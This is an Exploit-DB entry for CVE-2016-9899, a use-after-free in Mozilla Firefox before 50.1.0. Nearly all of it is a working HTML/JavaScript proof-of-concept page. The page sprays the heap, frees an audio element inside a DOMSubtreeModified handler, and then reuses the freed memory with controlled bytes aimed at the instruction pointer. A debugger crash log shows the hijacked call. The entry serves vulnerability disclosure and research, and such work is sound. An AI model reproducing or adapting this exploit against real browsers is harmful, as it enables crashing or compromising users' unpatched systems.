Mozilla Firefox < 50.1.0 - Use After Free

2017-01-13T00:00:00
ID EDB-ID:41042
Type exploitdb
Reporter Exploit-DB
Modified 2017-01-13T00:00:00

Description

Mozilla Firefox < 50.1.0 - Use After Free. CVE-2016-9899. Dos exploit for Windows platform

                                        
                                            &lt;!DOCTYPE html&gt;
&lt;html&gt;
  &lt;head&gt;
  &lt;!-- &lt;meta http-equiv="refresh" content="1"/&gt; --&gt;
  &lt;meta http-equiv="content-type" content="text/html; charset=UTF-8"&gt;
  &lt;meta http-equiv="Expires" content="0" /&gt;
  &lt;meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" /&gt;
  &lt;meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" /&gt;
  &lt;meta http-equiv="Pragma" content="no-cache" /&gt;
  &lt;style type="text/css"&gt;
   body{
        background-color:lime;
        font-color:red;
   };
  &lt;/style&gt;
  &lt;script type='text/javascript'&gt;&lt;/script&gt; 
  &lt;script type="text/javascript" language="JavaScript"&gt;
   
   /* 
    * Mozilla Firefox &lt; 50.1.0 Use-After-Free POC
    * Author: Marcin Ressel
    * Date: 13.01.2017
    * Vendor Homepage: www.mozilla.org
    * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/
    * Version: &lt; 50.1.0
    * Tested on: Windows 7 (x64) Firefox 32 && 64 bit
    * CVE: CVE-2016-9899
    *************************************************
    * (b1c.5e0): Access violation - code c0000005 (first chance)
    * First chance exceptions are reported before any exception handling.
    * This exception may be expected and handled.
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll - 
    * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580
    * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0         nv up ei pl nz na pe nc
    * cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    * xul!mozilla::net::LoadInfo::AddRef+0x3dd41:
    * 6d7cc44c ff12            call    dword ptr [edx]      ds:002b:4543484f=????????
    * 0:000&gt; dd eax
    * 0f804c00  4543484f 91919191 91919191 91919191
    * 0f804c10  91919191 91919191 91919191 91919191
    * 0f804c20  91919191 91919191 91919191 91919191
    * 0f804c30  91919191 91919191 91919191 91919191
    * 0f804c40  91919191 91919191 91919191 91919191
    * 0f804c50  91919191 91919191 91919191 91919191
    * 0f804c60  91919191 91919191 91919191 91919191
    * 0f804c70  91919191 91919191 91919191 91919191
    *
    */ 
   var doc = null;
   var cnt = 0;

   function m(blocks,size) {
            var arr = [];
            for(var i=0;i&lt;blocks;i++) {
                arr[i] = new Array(size);
                for(var j=0;j&lt;size;j+=2) {
                    arr[i][j] = 0x41414141;
                    arr[i][j+1] = 0x42424242;
                }
            }
            return arr;
    } 
      
    function handler() {    //free
             if(cnt &gt; 0) return;
             doc.body.appendChild(document.createElement("audio")).remove();      
             m(1024,1024);   
             ++cnt;
    }

    function trigger() {
             if(cnt  &gt; 0) {
                var pl = new Array();
                doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false); 
                for(var i=0;i&lt;4096;i++) {           //replace
                    pl[i]=new Uint8Array(1000);
                    pl[i][0] = 0x4F;
                    pl[i][1] = 0x48;
                    pl[i][2] = 0x43;
                    pl[i][3] = 0x45; //eip  
                    for(var j=4;j&lt;(1000) - 4;j++) pl[i][j] = 0x91; 
                   // pl[i] = document.createElement('media');
                    //document.body.appendChild(pl[i]);
                }
                window.pl = pl
                document.getElementById("t1").remove(); //re-use
             }
    }

    function testcase()
    {
             var df = m(4096,1000);
             document.body.setAttribute('df',df);
	     doc = document.getElementById("t1").contentWindow.document;
	     doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false); 
	     doc.getElementsByTagName("*")[0].style = "ANNNY";
	     setInterval("trigger();",1000);   

    }
  &lt;/script&gt;
  &lt;title&gt;Firefox &lt; 50.1.0 Use After Free (CVE-2016-9899) &lt;/title&gt;
  &lt;/head&gt;
  &lt;body onload='testcase();'&gt;
   &lt;iframe src='about:blank' id='t1' width="100%"&gt;&lt;/iframe&gt;
  &lt;/body&gt;
&lt;/html&gt;